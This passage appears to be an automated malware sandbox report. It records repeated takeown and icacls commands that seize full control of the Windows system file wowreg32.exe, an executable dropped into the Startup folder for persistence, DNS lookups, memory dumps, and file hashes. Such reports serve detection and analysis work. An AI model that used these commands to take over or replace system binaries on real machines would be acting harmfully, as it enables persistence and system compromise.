C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S KVIWLPUJ /U Admin /F "C:\Windows\System32\wowreg32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\System32\wowreg32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 27.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/4432-0-0x00007FFB88243000-0x00007FFB88245000-memory.dmp

memory/4432-1-0x00000143DF690000-0x00000143DF6B8000-memory.dmp

memory/4432-2-0x00007FFB88240000-0x00007FFB88D01000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\myriaYcFRu6.exe

MD5 fdd37962a54814f55dc56ef6e4a062af
SHA1 aa2423c8a3a207f607fd03f02538dbb557e69e3c
SHA256 142a2027b957a97f2f723b605a2e2a95586dbcc54ce3a6215b0fdb04b1d047e7
SHA512 5d4ba43c9f88c42b2321baa7dce849d1da8472ee4bba694134f4045300210ae5a8ee4b3789491f2c20b15e0e19f13ce9a3b52358256dcebbdd2dfe7117ec3ba4

memory/4432-1334-0x00007FFB88243000-0x00007FFB88245000-memory.dmp

memory/4432-1505-0x00007FFB88240000-0x00007FFB88D01000-memory.dmp

C:\Windows\System32\wowreg32.exe

MD5 ccde813d93df0efc54e4a346df173075
SHA1 d2211031e75c1b2c8499cc6320499fd97dbd5819
SHA256 e26c0e4c063a840d34212f0973816ae4bee56e92a52a0ece8c2cf765d079e1bc
SHA512 4b5ea53fabc7edf037e4b4809f68d5120a58395c27def5529af5a06d92c50b2bd98dce540a4aeceb4690b2ae2481f4857d411a42227adb087b11427f180e859d

C:\Windows\System32\wowreg32.exe

MD5 36549e81f1ad0a1fde7a0f1ce6ff37c8
SHA1 b25177a72bd9901d52bb3a2e6a0c996a7acec7aa
SHA256 7445a962f7a28a1364e87a1c01c5a4e9a60a02e9bf20945f42f80b3b8b96b99c
SHA512 47d5b15a86c99eeb09ad30db9215daccd1bf19a7562ea49328a61cb8a81269d8d5108a36fe77c7acc4774a67df0e5865166c00fc68dd2b91cb2cff2ed726d44e

C:\Windows\System32\wowreg32.exe

MD5 0a5ead827c6bb13f7252fa02872436f1
SHA1 784a3ff7a2b1a1f96d2c1b67c141e21a2ac7faa4
SHA256 6f1d6c5e3c0110e6b658f8db6938a128b6d51f89dd8e8a74e13c03e7c01b1770
SHA512 f4146c306ee5bd226bc6e60a294d19ef0a544dff9a4f27faffaa4059a9dcf05598184afef31cdb999b064c893ca484d8d6e6ebdf1e990ceeef56c6a791c440a1

C:\Windows\System32\wowreg32.exe

MD5 83cba40e6aea8cb582a53c8b772a0413
SHA1 da36f9bd8290c62c4e0dcc5d503d74618759979f
SHA256 f485d1c36ef4591406816740d211d5297bb569ce597b085419364cf469bf57de
SHA512 bee5e7340563b3e8f8954fbe4ac95b082e72a83ddbda0b42e2ea0cf0092979105da24c04ae79f283abba5cc0b39aa6d47b31431aff3ac3c869509cfc1d9dbd00

C:\Windows\System32\wowreg32.exe

MD5 a7705c19fc5518a70d1bb7cadfa74143
SHA1 8ccd866cf63cc2750b5ea922672183d6169d96f9
SHA256 3f35203bb1a9e4cbbab5d0a6155092d49b4e2d3be52e400cc08447cca646955f
SHA512 4d4a5917f32190538c25cb27aa5285078dae109eb6916dd592a2158b832209133a88b5fe77859b607f84fc25e5b47f5f7dcfa014e5753414862864628ef4f09c

C:\Windows\System32\wowreg32.exe

MD5 d11574a983488bcc2ed5803e2e0d9a63
SHA1 80548f16bfd4b21981a313f53e7e272e87042215
SHA256 efae7ffd996075719e4b562b202ca2fcd315c02e9fc9bb247bc901b48f69d619
SHA512 968df18922bb277f78247b08bbce83338659c885cd25c22294a695ca7d203a39f7a193ff480d7ee84f3b1b119b549d4896ad03432fea41d796dc5a4d3ce248c9